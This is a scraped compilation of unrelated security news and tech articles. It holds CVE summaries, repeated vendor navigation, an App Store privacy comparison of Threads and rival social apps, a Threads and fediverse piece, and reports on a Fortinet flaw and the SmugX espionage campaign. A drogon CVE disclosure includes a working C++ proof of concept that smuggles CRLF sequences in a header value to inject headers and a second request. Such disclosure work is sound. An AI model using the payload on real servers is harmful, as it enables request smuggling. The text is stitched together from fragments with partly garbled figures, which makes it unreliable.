In TravianZ 8.3.4 and 8.3.3, Incorrect Access Control in the installation script allows an attacker to overwrite the server configuration and inject PHP code.

CVE-2023-36994: TravianZ Hacked

A buffer overflow in ACDSee Free v2.0.2.227 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.

Skip to content

*   Shop
*   Products1
    
    *   DAM & Photo Editing Software
        
        *   Photo Studio Ultimate 2023
        *   Photo Studio Professional 2023
        *   Photo Studio Home 2023
        *   Photo Studio for Mac 9
        *   Gemstone Photo Editor 12
    *   *   LUXEA Pro Video Editor 7NEW
        *   Video Converter Pro 5
        *   Video Converter 5
    *   *   ACDSee Mobile Sync
        *   ACDSee Light EQ™
        *   ACDSee for iOS
        *   ACDSee Pro for iOS
        *   ACDSee Camera Pro for iOS
    *   *   Ultimate Pack 2023
    
    *   *   ACDSee SendPix™
        *   ACDSee Free
    *   *   ACDSee 365
    *   *   Photography Courses by Alec Watson
    *   *   ACDSee Photo Studio Enterprise 2023
        *   ACDSee Workgroup
    
*   Free Trials
*   Community
    *   ACDSee Workshops
    *   ACDSee Video Tutorials
    *   Tutorials by Alec Watson
    *   ACDSee Stock Photography
    *   ACDSee Online Forum
    *   ACDSee I/O
*   Contact
    *   Support
    *   About
    *   Careers
    *   Media Room
*   Business
    
    *   Volume Licensing
        *   Small & Medium Business
        *   Education
        *   ACDSee for K-12
        *   Government
        *   Enterprise
    *   Solutions
        *   ACDSee Workgroup
        *   Custom Development
        *   Technology Licensing
        *   ACDSee SDK
    *   Partners
        *   Resellers
        *   Affiliates
        *   OEM
    *   How to Buy
        *   Contact Sales
        *   Find a Reseller
    
*   My Account
*   English
    *   Deutsch
    *   Français
    *   Italiano
    *   Español
    *   Nederlands
    *   Pусский
    *   日本語
    *   简体中文
    *   繁體中文

*   Shop
*   Products1
    
    *   DAM & Photo Editing Software
        
        *   Photo Studio Ultimate 2023
        *   Photo Studio Professional 2023
        *   Photo Studio Home 2023
        *   Photo Studio for Mac 9
        *   Gemstone Photo Editor 12
    *   *   LUXEA Pro Video Editor 7NEW
        *   Video Converter Pro 5
        *   Video Converter 5
    *   *   ACDSee Mobile Sync
        *   ACDSee Light EQ™
        *   ACDSee for iOS
        *   ACDSee Pro for iOS
        *   ACDSee Camera Pro for iOS
    *   *   Ultimate Pack 2023
    
    *   *   ACDSee SendPix™
        *   ACDSee Free
    *   *   ACDSee 365
    *   *   Photography Courses by Alec Watson
    *   *   ACDSee Photo Studio Enterprise 2023
        *   ACDSee Workgroup
    
*   Free Trials
*   Community
    *   ACDSee Workshops
    *   ACDSee Video Tutorials
    *   Tutorials by Alec Watson
    *   ACDSee Stock Photography
    *   ACDSee Online Forum
    *   ACDSee I/O
*   Contact
    *   Support
    *   About
    *   Careers
    *   Media Room
*   Business
    
    *   Volume Licensing
        *   Small & Medium Business
        *   Education
        *   ACDSee for K-12
        *   Government
        *   Enterprise
    *   Solutions
        *   ACDSee Workgroup
        *   Custom Development
        *   Technology Licensing
        *   ACDSee SDK
    *   Partners
        *   Resellers
        *   Affiliates
        *   OEM
    *   How to Buy
        *   Contact Sales
        *   Find a Reseller
    
*   My Account
*   English
    *   Deutsch
    *   Français
    *   Italiano
    *   Español
    *   Nederlands
    *   Pусский
    *   日本語
    *   简体中文
    *   繁體中文

*   Shop
*   Products1
    
    *   DAM & Photo Editing Software
        
        *   Photo Studio Ultimate 2023
        *   Photo Studio Professional 2023
        *   Photo Studio Home 2023
        *   Photo Studio for Mac 9
        *   Gemstone Photo Editor 12
    *   *   LUXEA Pro Video Editor 7NEW
        *   Video Converter Pro 5
        *   Video Converter 5
    *   *   ACDSee Mobile Sync
        *   ACDSee Light EQ™
        *   ACDSee for iOS
        *   ACDSee Pro for iOS
        *   ACDSee Camera Pro for iOS
    *   *   Ultimate Pack 2023
    
    *   *   ACDSee SendPix™
        *   ACDSee Free
    *   *   ACDSee 365
    *   *   Photography Courses by Alec Watson
    *   *   ACDSee Photo Studio Enterprise 2023
        *   ACDSee Workgroup
    
*   Free Trials
*   Community
    *   ACDSee Workshops
    *   ACDSee Video Tutorials
    *   Tutorials by Alec Watson
    *   ACDSee Stock Photography
    *   ACDSee Online Forum
    *   ACDSee I/O
*   Contact
    *   Support
    *   About
    *   Careers
    *   Media Room
*   Business
    
    *   Volume Licensing
        *   Small & Medium Business
        *   Education
        *   ACDSee for K-12
        *   Government
        *   Enterprise
    *   Solutions
        *   ACDSee Workgroup
        *   Custom Development
        *   Technology Licensing
        *   ACDSee SDK
    *   Partners
        *   Resellers
        *   Affiliates
        *   OEM
    *   How to Buy
        *   Contact Sales
        *   Find a Reseller
    
*   My Account
*   English
    *   Deutsch
    *   Français
    *   Italiano
    *   Español
    *   Nederlands
    *   Pусский
    *   日本語
    *   简体中文
    *   繁體中文

Page load link

CVE-2023-33715: Index

Cross Site Request Forgery (CSRF) vulnerability in MultiTech Conduit AP MTCAP2-L4E1 MTCAP2-L4E1-868-042A v.6.0.0 allows a remote attacker to execute arbitrary code via a crafted script upload.

CVE-2023-25201: Security Advisories - usd HeroLab

Want to try out Meta’s new social media app? Here’s more context on what personal data is collected by Threads and similar social media apps.

Meta's long-awaited Twitter alternative is here, and it's called Threads. The new social media app launches at a time when alternatives, like Bluesky, Mastodon, and Spill, are vying for users who are dissatisfied with Elon Musk's handling of Twitter's user experience, with its newly introduced rate limits and an uptick in hate speech.

Meta owns Facebook, Instagram, and WhatsApp, so the company’s attempt to recreate an online experience similar to Twitter is likely to attract plenty of normies, lurkers, and nomadic shitposters. Threads uses the AT Protocol developed by Bluesky, and Meta is working to incorporate Threads as part of the online Fediverse, a group of shared servers where users can interact across multiple platforms.

If you’re hesitant to share your personal data with a company on the receiving end of a billion dollar fine, that’s understandable. For those who are curious, however, here’s what we know about the service’s privacy policy, what data you hand over when you sign up, and how it compares to the data collected by other options.

Threads

Threads (Android, Apple) potentially collects a wide assortment of personal data that remains connected to you, based on the information available in Apple’s App Store, from your purchase history and physical address to your browsing history and health information. “Sensitive information” is also listed as a type of data collected by the Threads app. Some information this could include is your race, sexual orientation, pregnancy status, and religion as well as your biometric data.

Threads falls under the larger privacy policy covering Meta’s other social media platforms. Want to see the whole thing? You can read it for yourself here. There’s one caveat, though. The app has a supplemental privacy policy that’s also worth reading. A noteworthy detail from this document is that while you’re able to deactivate your Threads account whenever, you must delete your Instagram if you fully want to delete your Threads account.

Below is all the data collected by Threads that’s mentioned in the App Store. Do you have the Facebook or Instagram app on your phone? Keep in mind that this data collection by Meta is comparable to the data those apps collect about you.

For Android users, the Google Play Store doesn’t require you to hand over the same amount of extensive data to try out Threads. You have more control than Apple users, since you can granularly toggle what personal data is shared with apps.

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ ( Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Analytics:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History, Financial Info, Payment Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   Contacts
*   _User Content_ (Photos or Videos, Gameplay Content, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**App Functionality:**

*   _Health & Fitness_ (Health, Fitness)
*   _Purchases_ (Purchase History)
*   _Financial Info_ (Payment Info, Credit Info, Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Sensitive Info_
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

**Other Purposes:**

*   _Purchases_ (Purchase History)
*   _Financial Info_ (Other Financial Info)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Physical Address, Email Address, Name, Phone Number, Other User Contact Info)
*   _Contacts_
*   _User Content_ (Photos or Videos, Gameplay Content, Customer Support, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)
*   _Other Data_

Bluesky

Looking for an app that collects less personal data? Bluesky (Android, Apple) is a buzzy Twitter alternative started by Twitter founder Jack Dorsey and managed by CEO Jay Graber. Bluesky uses the AT Protocol that it created. Like Mastodon already does and Threads soon will, Bluesky incorporates the Fediverse servers as its backbone. The app is currently invite-only, but it does not currently collect anywhere near as much information as Threads or Twitter.

For Bluesky, the data that’s linked to you is focused on app functionality, like remembering your email and user ID, or access to photos and videos on your device so you can post memes. Here’s where you can find more info about Bluesky’s privacy policy. Keep in mind the service is still new and adding features, so there will likely be changes as it evolves.

Below is all the data collected by Bluesky that’s mentioned in the App Store. (Remember that this is only for iPhone owners. If you use an Android smartphone, you have more control over what data is shared.)

Data Linked to You

**App Functionality:**

*   _Contact Info_ (Email Address)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)

Data Not Linked to You

**Analytics:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

Mastodon

What if you want a social media app that doesn’t suck up all your personal data? **Mastodon** (Android, Apple) might be a good option for you. Originally launched in 2016 by Eugen Rochko, Mastodon uses a decentralized protocol that’s different from Threads and Bluesky, called ActivityPub. It’s part of the Fediverse of shared servers. Mastodon is not exactly a new pick; it has positioned itself for years as an alternative to Twitter. (Remember, 2023 isn’t the first time users have considered ditching Twitter for something new and exciting.)

Are you trying it out for the first time? Here’s a great guide to getting started on Mastodon. There’s a bit of a learning curve with this one.

Below is all the data collected by Mastodon that’s mentioned in the App Store.

_\*In the style of Taylor Swift.\*_

\[Blank Space\]

That's right, the Mastodon app for iOS won't collect any data from your device. For Android owners, the app may share your name and email address with other companies.

If you don't like the official Mastodon apps for any reason, you can always try alternative apps with unique interfaces and features. Just be on the lookout for the privacy policies and data collection for those apps, since they don't have to commit to zero-data collection the way the official ones do.

Spill

Are you part of (or a fan of) Black Twitter and on the search for a new posting platform, preferably one that’s inclusive and voicey? Spill (Apple) is a Black-owned social media app that’s made with diverse communities in mind, specifically people of color. It was founded by Alphonzo “Phonz” Terrell and Devaris Brown, who both used to work at Twitter, and it launched earlier this year. Spill is not part of the Fediverse of shared servers.

Spill is currently invite-only, but you can sign up for the waiting list. While Spill does gather sensitive info, the other aspects of its data collection are not as extensive as Threads. Here’s the full privacy policy you can read over.

Below is all the data collected by Spill that’s mentioned in the App Store. It’s worth noting that Spill’s dev team is working on an Android app, but it’s not yet available to use.

Data Linked to You

**Developer's Advertising or Marketing:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Analytics:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Product Personalization:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**App Functionality:**

*   _Location_ (Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Emails or Text Messages, Photos or Videos, Audio Data)
*   _Sensitive Info_

**Other Purposes:**

*   _Contact Info_ (Email Address, Phone Number)

Hive Social

It’s a bit smaller than other platforms, but Hive Social (Android, Apple) is another contender for your attention span that’s particularly popular with gamers. This app is not part of the Fediverse. Nostalgic for the days when curated music would automatically play when a person visited your profile? This feature is one way Hive differentiates itself from Twitter, along with a built-in Q&A feature that lets your followers ask you questions (sometimes anonymously) that you can answer in posts to your feed. Want to give Hive a try? Check out our guide with tips for getting started.

The app collects information about you for functionality and analytics, but it’s not connected specifically to you. Learn more about what data the app uses by taking a look at its privacy policy.

Below is all the data collected by Hive Social that’s mentioned in the App Store for iPhone owners. (Have a Google Pixel or other Android device in your pocket? You can go into your privacy settings for more control over what data Hive collects.)

Data Not Linked to You

**Analytics:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**App Functionality:**

*   _Contact Info_ (Email Address, Name, Phone Number)
*   _User Content_ (Photos or Videos, Customer Support, Other User Content)
*   _Identifiers_ (User ID)
*   _Usage Data_ (Product Interaction, Other Usage Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

What About Twitter?

It may seem like Threads collects a ton of personal data. (Because it does!) For more context, let’s go over what Twitter asks for as well. Twitter (Android, Apple) keeps plenty of data that’s linked to users and used to track you, like your purchase history and browsing history. With that in mind, the app does not list “sensitive information” as one of the disclosed categories of data collection. Check out its full privacy policy for an in-depth breakdown.

Below is all the data collected by Twitter that’s mentioned in the App Store. (Escaped from Apple’s walled garden? The Android app for Twitter still collects some personal data, like your precise location and web browsing history, unless you adjust your privacy settings.)

Data Used to Track You

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

Data Linked to You

**Third-Party Advertising:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Performance Data)

**Developer's Advertising or Marketing:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address)
*   _User Content_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)

**Analytics:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contacts_
*   _User Content_ (Photos or Videos, Audio Data, Other User Content)
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data)

**Product Personalization:**

*   _Purchases_ (Purchase History)
*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Phone Number)
*   _Contacts_
*   _User Content_
*   _Search History_
*   _Browsing History_
*   _Identifiers_ (User ID, Device ID)
*   _Usage Data_ (Product Interaction, Advertising Data)
*   _Diagnostics_ (Crash Data, Performance Data, Other Diagnostic Data)

**Other Purposes:**

*   _Location_ (Precise Location, Coarse Location)
*   _Contact Info_ (Email Address, Name, Phone Number)
*   _Contacts_
*   _User Content_ (Photos or Videos)
*   Search History
*   _Identifiers_ (User ID)

Data Not Linked to You

**Third-Party Advertising:**

*   _Other Data_

**Developer's Advertising or Marketing:**

*   _Other Data_

**Analytics:**

*   _User Content_ (Emails or Text Messages)
*   _Other Data_

**App Functionality:**

*   _Contact Info_ (Physical Address)
*   _User Content_ (Emails or Text Messages)
*   _Other Data_

How Threads' Privacy Policy Compares to Twitter's (and Its Rivals')

Meta’s Twitter alternative promises that it will work with decentralized platforms, giving you greater control of your data. You can hold the company to that—if you don't sign up.

As Meta’s Twitter competitor, Threads, started generating buzz ahead of yesterday’s launch, curious netizens spotted a placeholder listing for the app in Apple’s App Store. Like all iOS apps, the listing included details about the user data the app is designed to collect and track. And observers couldn’t help but notice that this brand-new app was already listing a whopping 14 categories of data that “may be collected and linked to your identity.” 

It might be a jarring reminder, but this is par for the course with Meta-owned apps, which the company monetizes by selling targeted ads and personalized marketing. Facebook and Instagram’s iOS apps list even more categories than Threads, the Messenger app lists about as many, and even the secure messaging app WhatsApp discloses nine categories of “Data Linked to You.” So for people fed up with Twitter’s rapidly deteriorating platform (and vibes), a Meta-owned alternative—with its predictability and relative stability—could even potentially appeal to those who are generally concerned about data privacy. 

Early data suggests as much: Threads, which is directly linked to users’ Instagram accounts, saw 10 million sign-ups in its first seven hours, according to CEO Mark Zuckerberg. Ultimately, Meta’s pitch for Threads is simply that it’s the devil you know.

But one thing is different this time: Meta is dangling an opportunity to essentially be on Threads without signing up for the platform at all. The company announced yesterday that it is planning to make Threads interoperable with other, non-Meta social networks that support a decentralized protocol already used by WordPress and 2022’s decentralization poster child, Mastodon. This means that if Meta follows through, you’ll be able to see and interact with Threads content from other platforms and services that support the standard, which is known as ActivityPub.

Meta says that Threads will start supporting ActivityPub “soon,” a descriptor that doesn’t necessarily inspire confidence. The company has already spent years, for example, working on its longtime promise of default end-to-end encryption on Messenger. But incorporating decentralization into Threads, and specifically supporting ActivityPub, has reportedly been a core aspect of Meta’s vision for the app from the beginning. Meta has also already sketched out details of the plan in its supplemental privacy policy for Threads.

All of this means that if you’re sick of Meta’s data-gobbling ways, or you don’t already have an Instagram account and don’t want to get one, you actually have some leverage: Don’t join Threads. Use Mastodon or another ActivityPub platform until Threads comes to you. Or hang out on Bluesky, which doesn’t support ActivityPub but is working on its own vision of a decentralized, portable social network.

“The fact that large platforms are adopting ActivityPub is not only validation of the movement towards decentralized social media, but a path forward for people locked into these platforms to switch to better providers. Which in turn, puts pressure on such platforms to provide better, less exploitative services," Mastodon CEO Eugen Rochko wrote in a blog post ahead of yesterday’s Threads launch.

Easy examples of decentralized services you already intuitively understand are phones and email. You can call anyone on any number, even if you and the person you’re calling buy phone service from different companies. Same with email. Even if pretty much everyone you know uses Gmail, there’s nothing materially different about emailing with the Yahoo and Hotmail holdouts in your life. And maybe your friend Jane runs her own email server and her address is jane@janerox.com. Love that for you, Jane—doesn’t change anything for anyone else.

That’s it. That’s how “the fediverse,” or federated services, work too. You join a server, and you’re trusting that server with your data. But then you can communicate with all the other servers running the same protocol, and the only data everyone on all those other servers can see from you is the content you choose to put out there. So Gmail has all of your emails and usage history, and Jane has all of her own emails and usage history, but the only data she has about you on her server is the emails you’ve sent her. And the only data Gmail has about Jane comes from her interactions with you and any other Gmail users.

Decentralization doesn’t change the basic functions of a social network, and that’s fine. The whole point of these services is to be a platform for publicly posting and consuming information. They aren’t designed around implementing end-to-end encryption. The servers still have access to user data and can be subpoenaed by governments or hacked. But decentralization creates a model through which users can elect to entrust their information to servers based on which ones have less-predatory data practices.

Ross Schulman, senior fellow for decentralization at digital rights nonprofit the Electronic Frontier Foundation, notes that if Threads emerges as a massive player in the fediverse, there could be concerns about what he calls “social graph slurping." Meta will know who all of their users interact with and follow within Threads, and it will also be able to see who their users follow in the broader fediverse. And if Threads builds up anywhere near the reach of other Meta platforms, just this little slice of life would give the company a fairly expansive view of interactions beyond its borders.

“I am perhaps equal parts excited and apprehensive to see how things play out with Threads, but it is really underlining the beauty of the fediverse that you have every option and the opportunity to choose,” Schulman says. “If you like Meta and you want to be in there, great. Go join Threads, you’ll be happy there, and you’ll also have access to everything else. If you don’t want to be a part of Meta, but you’ve got friends or family that do or public figures or whatever, then fine. You can get an account on any number of other fediverse servers and then follow the people that you want. Or if you want nothing to do at all with Meta, then there are plenty of servers out there \[that\] have already announced that they're preemptively blocking Threads. So you can live that life, too.”

No matter who you throw your lot in with, an important concept is that the server you choose is still going to have access to your data, even though all the other servers don’t. If Threads implements ActivityPub and you use it to interact with the fediverse, you’re choosing Meta as your server and everything that comes with that. If you run your own server, like Jane, you can retain full control. But if you’re somewhere in the middle and use a server run by someone else, you need to keep an eye out for future changes. Mastodon is currently a crowdfunded platform, but it’s largely unclear what the business model will be for decentralized services like Bluesky. And future pivots could mean that your server eventually implements more user-monitoring or data-tracking practices. Then it might be time to move on—a process made easier by the portability that's built into the fediverse, allowing you to switch servers while maintaining your connections.

If you’re a Twitter user, or used to be, you have already dealt with a service that makes dramatic changes and completely upends your expectations and trust. But the Twitter case study illustrates a crucial idea. From a data privacy perspective, the worst-case scenario is no worse in the world of decentralization, the best-case scenario is much better, and, for once, you get a say in where you end up.

Don't Join Threads—Make Instagram's 'Twitter Killer' Join You

By Deeba Ahmed
The vulnerability has a CVSS score of 9.8 out of 10, is a critical security bug that affects Fortinet appliances and has been actively exploited in the wild. 
This is a post from HackRead.com Read the original post: Critical RCE Vulnerability Puts 330,000 Fortinet Firewalls at Risk

With a staggering count of 490,000 SSL VPN interfaces vulnerable and readily accessible on the internet, the urgency becomes apparent.

There has never been a dearth of security flaws in Fortinet products, which is why cybercriminals consider them lucrative attack vectors.

The latest discovery adds to the woes of Fortinet users because Bishop Fox security researchers report that out of the total 490,000 public internet-exposed Fortinet FortiOS and FortiProxy SSL-VPNs interfaces scanned by Shodan, 69% are vulnerable to a dangerous RCE (remote code execution) vulnerability (CVE-2023-27997).

This means that around 330,000 Fortinet FortiGate firewalls are unpatched and vulnerable to this flaw.

**The Discovery of the Flaw**

Bishop Fox researchers found out that only 153,414 of the appliances have been patched with the FortinetOS version. That’s not all. Researchers also discovered that most publicly accessible Fortinet appliances hadn’t been patched in the last eight years and are running FortiOS versions 5 and 6.

If only 153,414 devices on the internet are patched, that leaves 335,923 – 489,337 – 69 unpatched. This is certainly concerning, researchers wrote in their report published on June 30, 2023.

BishopFox Exploit: Remote code execution via CVE-2023-27997

The Capability Development team at Bishop Fox made the discovery after creating an exploit for CVE-2023-27997 and continuing to test Cosmos customers. The exploit easily smashed the heap, connected to the attacker’s C2 server, downloaded a BusyBox binary, and opened an interactive shell.

**What is CVE-2023-27997**

For your information, CVE-2023-27997, which has a CVSS score of 9.8 out of 10, is a critical security bug that affects Fortinet appliances and has been actively exploited in the wild. This flaw was discovered by researchers Charles Fol and Dan Bach from security firm Lexfo, who tweeted about it on June 11th.

The issue allows attackers to execute arbitrary code or commands through custom-designed requests. Essentially, it is a heap overflow flaw that primarily targets the Secure Sockets Layer Virtual Private Networks of Fortinet products.

**Fortinet’s Response**

Fortinet addressed this critical flaw on June 12th by releasing patches for the FortiOS firmware versions 7.0.12, 7.2.5, 6.4.13, and 6.2.15. The company also admitted that this vulnerability may have been exploited in the wild in a limited number of cases in targeted attacks against critical infrastructure, government, and manufacturing sectors.

“You should patch yours now,” wrote report author and Capability Development team’s director, Caleb Gross.

**RELATED ARTICLES**

1.  Hackers leak login credentials of vulnerable Fortinet SSL VPNs
2.  Chinese Hackers Exploiting 0-day Vulnerability in Fortinet Products
3.  Hackers dump login credentials of Fortinet VPN users in plain-text
4.  Hackers exploiting critical vulnerabilities in Fortinet VPN – FBI-CISA

Critical RCE Vulnerability Puts 330,000 Fortinet Firewalls at Risk

All versions of the package drogonframework/drogon are vulnerable to CRLF Injection when untrusted user input is used to set request headers in the addHeader function. An attacker can add the \r\n (carriage return line feeds) characters and inject additional headers in the request sent.

CRLF Injection in drogon@v1.8.4

#include <drogon/drogon.h>

#include <future>

#include <iostream>

using namespace drogon;

int main()

{

auto client \= HttpClient::newHttpClient("http://localhost:8081");

auto r \= HttpRequest::newHttpRequest();

r\->setMethod(drogon::Get);

r\->setPath("/test1");

r\->addHeader("MyHeader", "A\\r\\nevil: hello1\\r\\n\\r\\nGET /test2 HTTP/1.1\\r\\nevil: hello2\\r\\n");

client\->sendRequest(

r, \[\](ReqResult result, const HttpResponsePtr &response) {

if (result != ReqResult::Ok)

{

std::cout

<< "error while sending request to server! result: "

<< result << std::endl;

return;

}

std::cout << "receive response!" << std::endl;

std::cout << response\->getBody() << std::endl;

});

app().run();

}

#include <drogon/drogon.h>

using namespace drogon;

int main()

{

app().registerHandler(

"/test1",

\[\](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)\> &&callback) {

auto resp \= HttpResponse::newHttpResponse();

std::cout << "\\ntest1 request received" << std::endl;

auto headers \= req\->getHeaders();

std::cout << "HEADERS" << std::endl;

for (auto const &header : headers)

{

std::cout << header.first << "\=" << header.second << std::endl;

}

resp\->setBody("test1");

callback(resp);

},

{Get});

app().registerHandler(

"/test2",

\[\](const HttpRequestPtr &req,

std::function<void(const HttpResponsePtr &)\> &&callback) {

auto resp \= HttpResponse::newHttpResponse();

std::cout << "\\ntest2 request received" << std::endl;

auto headers \= req\->getHeaders();

std::cout << "HEADERS" << std::endl;

for (auto const &header : headers)

{

std::cout << header.first << "\=" << header.second << std::endl;

}

resp\->setBody("test2");

callback(resp);

},

{Get});

LOG\_INFO << "Server running on 0.0.0.0:8081";

app().addListener("0.0.0.0", 8081).run();

}

CVE-2023-26138: CRLF Injection in drogon@v1.8.4

By Deeba Ahmed
The researchers believe that the SmugX attack is an extension of a previously discovered campaign linked to Mustang Panda.
This is a post from HackRead.com Read the original post: SmugX: Chinese Hackers Targeting Embassies in Europe

**The attack method of the SmugX campaign includes attackers using HTML smuggling to target victims.**

Check Point Research’s (CPR) cyber threat intelligence researchers have discovered a disturbing attack trend. According to CPR’s report published on July 3, 2023, Chinese threat actors have become increasingly interested in targeting European governments, embassies, and foreign local policy-making entities. Eastern Europe is among their preferred targets, with prime targets being Slovakia, the Czech Republic, and Hungary.

This newly discovered campaign is dubbed SmugX. Researchers claim that this campaign has been active since December 2022, but they believe that it is an extension of a previously discovered campaign linked to Mustang Panda and RedDelta. Interestingly, both groups are Chinese.

As far as the attack method is concerned, research revealed that in SmugX, attackers are using HTML smuggling to target European embassies. In this method, the modular PlugX malware implant is smuggled (hidden) inside HTML documents.

Hackers use this technique to trick web security systems and evade antivirus mechanisms or security defences. HTML smuggling exploits HTML features to conceal malicious data documents from automated content filters, including them as JavaScript blobs that reassemble on the targeted device.

It is worth noting that PluxX is a commonly used tool for HTML smuggling. Multiple Chinese threat actors have used this malware previously, such as the group that targeted the Vatican in 2020 or the one that targeted the Indonesian Intelligence Service in 2021. The malware was also used to target users in Mongolia, Ghana, Papua New Guinea, Nigeria, and Zimbabwe in a USB drive-based campaign.

CPR researchers agree that SmugX’s primary objective is to obtain sensitive data on the foreign policies of the targeted countries. This analysis is based on the lure samples posted to the malware repository on VirusTotal. The filenames of these samples were self-explanatory.

Researchers wrote that the names strongly suggested that the attackers wanted to target diplomats and government entities, whereas the content contained mainly diplomatic-related content related to China. The attack utilizes several .docx and .pdf files containing diplomatic content.

CPR researchers obtained a letter from the Serbian embassy in Budapest, a document revealing the Swedish Presidency of the Council of the European Union’s priorities, and an invitation from the Hungarian foreign ministry for a diplomatic conference.

The researchers also discovered an article about the two Chinese human rights lawyers who had received a ten-year sentence. Here are the titles of these documents:

*   202305 Indicative Planning RELEX
*   Draft Prague Process Action Plan\_SOM\_EN
*   2262\_3\_PrepCom\_Proposal\_next\_meeting\_26\_April
*   Comments FRANCE – EU-CELAC Summit – 4th May
*   China jails two human rights lawyers for Subversion

One of the phishing documents (left) – Targeted countries (right)

“While none of the techniques observed in this campaign is new or unique, the combination of the different tactics, and the variety of infection chains resulting in low detection rates, enabled the threat actors to stay under the radar for quite a while,” CPR researchers noted.

CPR is still investigating and monitoring SmugX activities and will share new details soon. Please continue to visit this platform for the latest updates on SmugX.

**RELATED ARTICLES**

1.  Killnet Hits European Parliament Website with DDoS Attack
2.  Research sector hit in new phishing attack using Google Drive
3.  Fake WHO Emails on COVID-19 Drop Nerbian RAT Across Europe
4.  European Spyware Vendor Offering Android & iOS Device Exploits
5.  Zimbra email platform flaw exploited to steal European govt emails

SmugX: Chinese Hackers Targeting Embassies in Europe

No less than 330000 FortiGate firewalls are still unpatched and vulnerable to CVE-2023-27997, a critical security flaw affecting Fortinet devices that have come under active exploitation in the wild.
Cybersecurity firm Bishop Fox, in a report published last week, said that out of nearly 490,000 Fortinet SSL-VPN interfaces exposed on the internet, about 69 percent remain unpatched.
CVE-2023-27997

